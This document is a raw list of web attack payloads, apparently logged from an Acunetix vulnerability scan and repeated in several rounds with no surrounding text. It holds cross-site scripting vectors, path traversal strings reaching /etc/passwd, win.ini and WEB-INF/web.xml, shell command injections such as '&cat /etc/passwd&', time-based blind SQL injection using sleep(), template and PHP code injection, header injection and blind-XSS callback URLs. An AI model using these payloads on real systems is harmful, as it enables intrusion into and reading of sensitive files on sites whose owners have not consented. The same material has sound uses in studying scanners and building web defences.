1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(970453)"></g></svg>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

response.write(9932010*9972986)

1<div style=width:expression(prompt(900204))>

1

1

1

1

'+response.write(9932010*9972986)+'

1<iframe src='data:text/html

&cat /etc/passwd&

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

"+response.write(9932010*9972986)+"

1

1

1<body onload=prompt(938236)>

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(950641)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(928734)>

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6.5),0)/*'XOR(if(now()=sysdate(),sleep(6.5),0))OR'"XOR(if(now()=sysdate(),sleep(6.5),0))OR"*/

1

1

1

`cat /etc/passwd`

WEB-INF/web.xml

1<img/src=">" onerror=alert(917865)>

1

${100025+100307}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(6.5)))v)/*'+(select(0)from(select(sleep(6.5)))v)+'"+(select(0)from(select(sleep(6.5)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

WEB-INF\web.xml

1

|cat /etc/passwd#

1<ScRiPt%20>prompt(904304)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1

1some_inexistent_file_with_long_name%00.jpg

1&n926297=v956252

1

1

1&lt

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

-1)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

\xf6<img acu onmouseover=prompt(992996) //\xf6>

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1))

"|"ld

testasp.vulnweb.com

'"()

1

1<input autofocus onfocus=prompt(963386)>

^(#$!@#$)(()))******

1

cfK5OP90'

1

/etc/passwd

'

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

4sHPlgyB')

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1

1

"

[url=http://www.acunetix.com]website security[/url]

1

xpusE220'))

1

1_Qn7Z3 <ScRiPt >prompt(988538)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

||cat /etc/passwd

1

http://hitQCG4DjPDjw.bxss.me/

1

-1)

1

1

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

1

1

-1))

1

1

1

comments

http://www.acunetix.tst

1

1

'&dir&'

8bkTO5bU'

'"

1'"()&%<ScRiPt >prompt(919770)</ScRiPt>

comments

file:///etc/passwd

1

1

"&dir&"

j4xo1spU')

<!--

'"()&%<ScRiPt >prompt(973672)</ScRiPt>

1

comments/.

1

1

mfvqMiwW'))

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1

1_937095

1

1

'|dir

1

1

WEB-INF/web.xml

1

"|dir

1

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

acu2615\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2615

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

acux3034\xc0\xbez1\xc0\xbcz2a\x90bcxuca3034

1

1

1

1<ScRiPt >prompt(974527)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(964808)</script>

................windowswin.ini

1

1

1<ScRiPt >prompt(927598)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?975446></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

response.write(9371219*9723188)

1

1

1<ScRiPt >prompt(997773)</ScRiPt>

1

SomeCustomInjectedHeader:injected_by_wvs

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

1

1

1

1<video><source onerror="javascript:prompt(918178)">

'+response.write(9371219*9723188)+'

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

"+response.write(9371219*9723188)+"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(960573)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1<div style=width:expression(prompt(983563))>

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

1

1

1<iframe src='data:text/html

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

WEB-INF/web.xml

1

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<body onload=prompt(998611)>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

WEB-INF\web.xml

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

../../../../../../../../../../etc/passwd.jpg

${99226+100129}

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(993260)>

1&n990261=v927205

-1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<img src=xyz OnErRor=prompt(959199)>

-1)

1

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

)

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(934400)>

testasp.vulnweb.com

'

1

!(()&&!|*|*|

'"()

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(953804)</sCripT>

rhgkds0J'

"

'

1

^(#$!@#$)(()))******

1

1

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"

${@print(md5(acunetix_wvs_security_test))}

XFdyuCpB')

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

\xf6<img acu onmouseover=prompt(950013) //\xf6>

1

1

/etc/passwd

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

Tpo3vtFA'))

1

1<input autofocus onfocus=prompt(931927)>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

&dir

-1

acunetix_wvs_invalid_filename

<a href='http://www.acunetix.com'>website security</a>

http://hithCWzzVzCPv.bxss.me/

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

'&dir&'

comments

[url=http://www.acunetix.com]website security[/url]

1

1

1

-1))

comments

"&dir&"

1_0WpDy <ScRiPt >prompt(938871)</ScRiPt>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://www.acunetix.tst

'"

25u021mt'

1'"()&%<ScRiPt >prompt(985160)</ScRiPt>

comments/.

1

1

|dir

<!--

1

LexsqKhZ')

1

'"()&%<ScRiPt >prompt(951810)</ScRiPt>

1

1

1

'|dir

1

file:///etc/passwd

1_966009

8bPDWvH1'))

1

1

1

1

"|dir

/\../\../\../\../\../\../\../etc/passwd

1

1

1

WEB-INF/web.xml

acu5118\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5118

1

1

1

acux7719\xc0\xbez1\xc0\xbcz2a\x90bcxuca7719

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(993414)</ScRiPt>

1

1

1

1<script>prompt(989863)</script>

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(911935)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998532></ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(913320)</ScRiPt>

1

1

1

................windowswin.ini

1<video><source onerror="javascript:prompt(903336)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(914386)"></g></svg>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<div style=width:expression(prompt(952482))>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(989117)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9549388*9930303)

1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(963831)>

&cat /etc/passwd&

'+response.write(9549388*9930303)+'

1

1<img src=xyz OnErRor=prompt(998142)>

"+response.write(9549388*9930303)+"

1

1

1<img/src=">" onerror=alert(979733)>

1

1

WEB-INF/web.xml

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<ScRiPt%20>prompt(997569)</sCripT>

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1&lt

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

\xf6<img acu onmouseover=prompt(947578) //\xf6>

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

-1

../../../../../../../../../../etc/passwd.jpg

1

1

1<input autofocus onfocus=prompt(950541)>

1

1

1

${99531+100360}

-1)

`cat /etc/passwd`

<a href='http://www.acunetix.com'>website security</a>

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1))

[url=http://www.acunetix.com]website security[/url]

1

1

|cat /etc/passwd#

1

1&n907231=v981054

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

6ja8ro1E'

1

1

1_cTDmS <ScRiPt >prompt(926202)</ScRiPt>

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

rGhXd74n')

1

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

tvhFPexs'))

'"()

1

"|"ld

^(#$!@#$)(()))******

'

testasp.vulnweb.com

1

-1

1

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

1

1

1

-1)

1

1

1

'

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

http://hitswPWvQHiPN.bxss.me/

-1))

1

1

"

1

1

${@print(md5(acunetix_wvs_security_test))}\

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

comments

1

Gz97N79K'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

||cat /etc/passwd

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

PKS3LJJJ')

1

1

'"

1

&dir

1

1

comments/.

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

z8XdJTuB'))

1'"()&%<ScRiPt >prompt(912820)</ScRiPt>

<!--

'&dir&'

1

1

1

'"()&%<ScRiPt >prompt(945920)</ScRiPt>

1

1

1

1

"&dir&"

1

1

file:///etc/passwd

1_995872

1

|dir

1

1

1

1

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

1

acu2386\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2386

../../../../../../../../../../windows/win.ini

1

1

1

acux3983\xc0\xbez1\xc0\xbcz2a\x90bcxuca3983

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(922279)</ScRiPt>

1

1

1

1<script>prompt(912946)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(937124)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?909737></ScRiPt>

................windowswin.ini

1

1

1

1

response.write(9632788*9037235)

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(911749)</ScRiPt>

1

'+response.write(9632788*9037235)+'

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(980729)">

1

&cat /etc/passwd&

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"+response.write(9632788*9037235)+"

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(968049)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(901115))>

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

1

-1

1

1

../../../../../../../../../../etc/passwd.jpg

WEB-INF/web.xml

cat /etc/passwd

1

1<body onload=prompt(951169)>

1

${100313+100118}

1

-1)

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n973300=v994535

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(966286)>

1

-1))

1

1

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<img src=xyz OnErRor=prompt(949371)>

JjhCnifn'

1

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

cvREwJ7b')

1<img/src=">" onerror=alert(931531)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

1

'"()

1

testasp.vulnweb.com

'

1<ScRiPt%20>prompt(983178)</sCripT>

^(#$!@#$)(()))******

SPS5VXCi'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1

1

"

1

1

1&lt

-1

1

/etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

1

-1)

1

\xf6<img acu onmouseover=prompt(966378) //\xf6>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1))

'

1

1<input autofocus onfocus=prompt(975733)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

NpK8dGaH'

1

1

"

<a href='http://www.acunetix.com'>website security</a>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://hitRyUxDoInpj.bxss.me/

1

pw3dN4bu')

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

[url=http://www.acunetix.com]website security[/url]

comments

1

1

1

||cat /etc/passwd

Ep3YjwKs'))

1

file:///etc/passwd

1_fMU93 <ScRiPt >prompt(957085)</ScRiPt>

1

comments

http://www.acunetix.tst

'"

&dir

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(915759)</ScRiPt>

comments/.

<!--

1

1

1

'&dir&'

1

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(937570)</ScRiPt>

1

1

1

1

"&dir&"

1

1

WEB-INF\web.xml

1_915675

1

1

|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

'|dir

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

"|dir

1

acu8600\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8600

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acux10857\xc0\xbez1\xc0\xbcz2a\x90bcxuca10857

1

................windowswin.ini

1

1

1<ScRiPt >prompt(903818)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(977360)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(956236)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957124></ScRiPt>

response.write(9625375*9199110)

1<ScRiPt >prompt(950294)</ScRiPt>

1

1

1

'+response.write(9625375*9199110)+'

1<video><source onerror="javascript:prompt(974768)">

&cat /etc/passwd&

WEB-INF/web.xml

1

1

"+response.write(9625375*9199110)+"

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(942342)"></g></svg>

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<div style=width:expression(prompt(945919))>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

cat /etc/passwd

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd.jpg

1

1

1<body onload=prompt(979549)>

1

${99297+100004}

1

1

-1

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(997478)>

1

1

1

1

|cat /etc/passwd#

-1)

1

1&n963439=v947555

1<img src=xyz OnErRor=prompt(999259)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

'|'ld

1<img/src=">" onerror=alert(940487)>

1

-1))

1some_inexistent_file_with_long_name%00.jpg

1

1

"|"ld

1<ScRiPt%20>prompt(900366)</sCripT>

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

an4ZtQZj'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

testasp.vulnweb.com

^(#$!@#$)(()))******

1&lt

1

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

62DFDiqJ')

1

1

\xf6<img acu onmouseover=prompt(934753) //\xf6>

1

1

1

'

"

/etc/passwd

ffHfiYLt'))

1<input autofocus onfocus=prompt(920544)>

1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

${@print(md5(acunetix_wvs_security_test))}

-1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

-1)

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

1

1

1_xRl3i <ScRiPt >prompt(975463)</ScRiPt>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

http://hitP8LkkumMce.bxss.me/

-1))

1

'&dir&'

1

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

ZrHtkrRN'

1

"&dir&"

1

file:///etc/passwd

1

http://www.acunetix.tst

comments

1

moNwY9uf')

1

1

|dir

'"

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(911809)</ScRiPt>

0UBMG8i6'))

1

1

comments

1

<!--

1

'|dir

'"()&%<ScRiPt >prompt(996704)</ScRiPt>

WEB-INF/web.xml

1

comments/.

1

1

"|dir

1

WEB-INF\web.xml

1_926104

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acu8336\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8336

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1

acux4319\xc0\xbez1\xc0\xbcz2a\x90bcxuca4319

1

1

1<ScRiPt >prompt(939366)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(984131)</script>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(932563)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?959125></ScRiPt>

1

1

1

1<ScRiPt >prompt(961431)</ScRiPt>

response.write(9929941*9802419)

1

1

1

1<video><source onerror="javascript:prompt(920633)">

1

WEB-INF/web.xml

'+response.write(9929941*9802419)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(995053)"></g></svg>

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9929941*9802419)+"

1<div style=width:expression(prompt(958141))>

'&cat /etc/passwd&'

1

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

cat /etc/passwd

1

1

1<body onload=prompt(900874)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(919233)>

1

1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

${100155+100223}

1

-1

1<img src=xyz OnErRor=prompt(989078)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n903202=v968083

1

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<img/src=">" onerror=alert(943744)>

-1)

1some_inexistent_file_with_long_name%00.jpg

1

1

1

'|'ld

1<ScRiPt%20>prompt(907959)</sCripT>

)

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

umrDcgyB'

!(()&&!|*|*|

1&lt

'

1

"|"ld

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

8dE8Y635')

\xf6<img acu onmouseover=prompt(904285) //\xf6>

^(#$!@#$)(()))******

1

"

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

cq5rO5th'))

1<input autofocus onfocus=prompt(969174)>

${@print(md5(acunetix_wvs_security_test))}

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'

1

1

1

-1

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

<a href='http://www.acunetix.com'>website security</a>

1

1

"

1

1

1

-1)

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1_OnRUL <ScRiPt >prompt(993870)</ScRiPt>

1

http://hit5lDA45A7Vz.bxss.me/

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

comments

1

1

2dsgdGhG'

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

comments

'&dir&'

http://www.acunetix.tst

EpHyJIuI')

1

1

1

'"

comments/.

"&dir&"

USpeEbeD'))

1

1

1

1

1

<!--

file:///etc/passwd

|dir

1

1

1

1'"()&%<ScRiPt >prompt(983999)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(923219)</ScRiPt>

1

'|dir

1

1_973227

1

WEB-INF/web.xml

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

acu5762\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5762

1

../../../../../../../../../../boot.ini

acux5478\xc0\xbez1\xc0\xbcz2a\x90bcxuca5478

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(991682)</ScRiPt>

1

1

1

1<script>prompt(967055)</script>

